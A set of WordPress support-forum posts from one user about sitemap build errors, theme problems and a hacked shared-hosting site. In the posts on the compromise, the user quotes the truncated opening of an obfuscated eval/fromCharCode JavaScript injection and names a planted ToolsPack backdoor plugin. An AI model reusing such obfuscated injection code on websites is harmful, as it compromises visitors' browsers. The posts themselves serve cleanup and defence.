adebaby

spoke too soon. the build has stopped working again

The last run didn’t finish! Maybe you can raise the memory or time limit for PHP scripts. Learn more
The last known memory usage of the script was 36.25MB, the limit of your server is 256M.
The last known execution time of the script was 2.2 seconds, the limit of your server is 120 seconds.

I have set high limits lower down. It maybe a caching issue as the first build after installing was ok

I had tried excluding a category just before the error started again unticking it made no difference. I do have a number of exclude options set.

I tried again and noticed the memory limit is empty. I entered a high limit and now it works. I wonder if a plugin upgrade lost the memory setting

Thanks

I found the log and rebuilt the xml but nothing in the error log after. I did see a warning in the plugin page that it had stopped building the xml at the failed line number but the memory usage was well within the limit. I rebuilt and there was no error but the same break in the xml

Looking at some other plugins, they save multiple xml files which means there is a failsafe when there is a problem in one sheet

I had the same problem, 0 index after updating and rebuilding the index. Deactivate, then activate and then rebuild the index

Found it! My style.css had been moved to a css folder which broke the theme and for some reason the templates were no longer recognised

frankgresslin – Yandex is a russian version of google and not malicious. They sent an automated email to warn that the site was infected

Im thinking of splitting my hosting. multi domain hosting on one account is convenient but not as secure

someone wrote that russian servers should be banned from the internet due to all the trouble they cause. can agree now

It will be in your admin pages somewhere. but i would get an ftp program and look in all your wordpress plugins for toolpack and check existing plugins are up to date and secure. remove any old plugins u dont need

I seem to have found my problem and i wouldn’t be surpised if sharon has same problem

I had two sites in a hosting plan infected. one site was a dormant wordpress site locked with absolute security plugin which is apparently not secure now

https://blog.sucuri.net/2012/02/vulnerability-in-the-absolute-privacy-plugin.html

I then looked on the server logs for this site a saw that a russian server 83.69.224.224 was calling /wp-content/plugins/ToolsPack/ToolsPack.php every hour. I deleted all the files on this site a few hours ago and i can see that toolspack was being hit until i deleted it and now it is a 404 and since then my server is so far ok. The same blog also has an article on this toolspack

https://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html

I don’t recall using this toolspack plugin but somehow it got installed, probably through the absolute privacy plugin

Check all your plugin folders for this plugin

Edit: Absolute privacy has been fixed now but the plugin had not been updated on my server
https://www.ads-software.com/support/topic/absolute-privacy-badly-broken?replies=12

who is your hosting company? Is it a shared host?

There is a post from yesterday about the script which generates the hack

pastebin.com/pGmDGqzz

a few other posts there also have the same js hack

the index.php malware script returned within an hour or two. cant see anything suspicious in the logs, ftp password had been changed. have replaced all the core files except the content and see if it comes back again

Same here

<script>if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log and then a load of numbers

i have 2 domains with wordpress hacked on a shared hosting account but 2 other domains with wordpress were unaffected. The affected domains were thankfully much lower use than the others

Just replace the index.php with a new copy. all is well after but hard to know if any other files are infected

Only thing that i noticed was that the two affected domains had the twitter for wordpress plugin and the others don’t. could be coincedence

Found the answer, new actions in WP 3.2 –

“Rename duplicate ‘delete_post’ and ‘deleted_post’ actions to ‘before_delete_post’ and ‘after_delete_post'”

delete_post presumably defaults to after_delete_post. Would be better if the default was before_delete_post